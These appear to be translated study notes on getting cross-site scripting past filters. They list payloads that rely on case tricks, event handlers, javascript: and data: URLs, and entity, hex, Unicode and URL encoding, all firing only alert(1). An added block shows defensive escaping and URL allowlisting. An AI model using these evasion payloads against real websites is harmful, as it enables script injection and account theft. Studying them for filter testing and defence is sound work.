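2019-11-22: XSS bypass notes
XSS payload variations
Mixed case: sCRipt
Doubled writing: scrscriptipt
Use the src attribute of certain tags to build the payload: when src cannot find its data source the element raises an error internally, and onerror fires on that error. Or use the iframe tag, <iframe src="javascript:alert(1)">, or the svg tag, <svg/onload=alert(1)>
Through certain attributes such as background, data, code, poster
Through certain events: onclick, onload, onerror, onstart, etc.
When parentheses are restricted: <a onmouseover="javascript:window.onerror=alert;throw 1">123</a>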
<img src=x onerror="javascript:window.onerror=alert;throw 1">
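Conditions for XSS to run
1. A standalone script tag
2. Inside certain tags
JavaScript pseudo-protocol
Pseudo-protocols differ from the protocols that actually exist on the Internet, such as http://, https:// and ftp://; they exist to hand off to an associated application. Examples: tencent:// (associated with QQ), data: (uses base64 encoding to output binary files on the browser side), and javascript:
This special protocol type declares that the body of the URL is arbitrary JavaScript code, which is run by the JavaScript interpreter. If the JavaScript code in a javascript: URL contains multiple statements, they must be separated with semicolons.
data pseudo-protocol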
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
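How to execute an XSS statement inside a tag
Close the attribute or close the tag; if it cannot be closed, the input may have been HTML-encoded (the htmlspecialchars function)
Use events
Special attributes src/href/action
javascript pseudo-protocol
data pseudo-protocol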
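The variants above (mixed case, doubled writing, javascript: and data: URLs in src/href/action) all target blacklist-style filtering. The following added example, which is not part of the original notes, contrasts such a filter with output encoding and a URL scheme allowlist; the function names and the example.invalid base URL are assumptions.

```javascript
// Added example, not from the original notes. Function names are
// hypothetical; sample inputs are constructed from the note's payload shapes.

// Weak: one-pass, case-sensitive blacklist, the kind of filter the
// "mixed case" and "doubled writing" variants are aimed at.
function naiveFilter(input) {
  return input.replace(/script/g, "");
}

// Hardened, HTML text and quoted-attribute context: encode instead of
// deleting, so no input can close the attribute or open a tag.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened, src/href/action context: escaping alone does not stop
// javascript: or data: URLs, so allowlist the scheme after parsing.
// The base URL is a placeholder used only to resolve relative links.
function safeUrl(input, base = "https://example.invalid/") {
  let url;
  try {
    url = new URL(input, base);
  } catch {
    return null;
  }
  return ["http:", "https:"].includes(url.protocol) ? url.href : null;
}

// Build a link from untrusted href and text using both defences.
function renderLink(href, text) {
  const target = safeUrl(href) ?? "#";
  return `<a href="${escapeHtml(target)}">${escapeHtml(text)}</a>`;
}

const samples = ["<scrscriptipt>alert(1)</scrscriptipt>", "<sCRipt>alert(1)</sCRipt>"];
for (const s of samples) {
  console.log("naive :", naiveFilter(s));
  console.log("escape:", escapeHtml(s));
}
console.log(renderLink("javascript:alert(1)", "<img src=x onerror=alert(1)>"));
```

The blacklist reassembles or misses the tag in both samples, while the encoded output contains no markup at all and the rejected URL falls back to "#".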
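HTML entity encoding
Note when entering this in the browser: in a URL, & is the parameter separator and everything after # is ignored, so & and # must be URL-encoded.
<img src=x onerror=alert(1)> then becomes the final payload: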
<img src=x onerror=alert%26%2340%3B%26%2349%3B%26%2341%3B>
The String.fromCharCode function builds a string from ASCII codes.
The eval function evaluates a string and executes the JavaScript code in it.
<script>alert(1)</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>
Hexadecimal encoding
<img src=x onerror=eval("\x61\x6C\x65\x72\x74\x28\x31\x29")>
<script>eval("\x61\x6C\x65\x72\x74\x28\x31\x29")</script>
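Unicode encoding
Unicode was created to overcome the limitations of traditional character encoding schemes. It assigns a single, unique binary code to every character of every language, to meet the needs of cross-language and cross-platform text conversion and processing. Development began in 1990 and it was officially published in 1994.
In JS, a Unicode escape is a string written as hexadecimal digits with a leading \u, i.e. \unnnn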
'\u54e6' -> "哦"
<img src=x onerror=eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029")>
URL encoding
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3e
jsfuck
<script>jsfuck</script>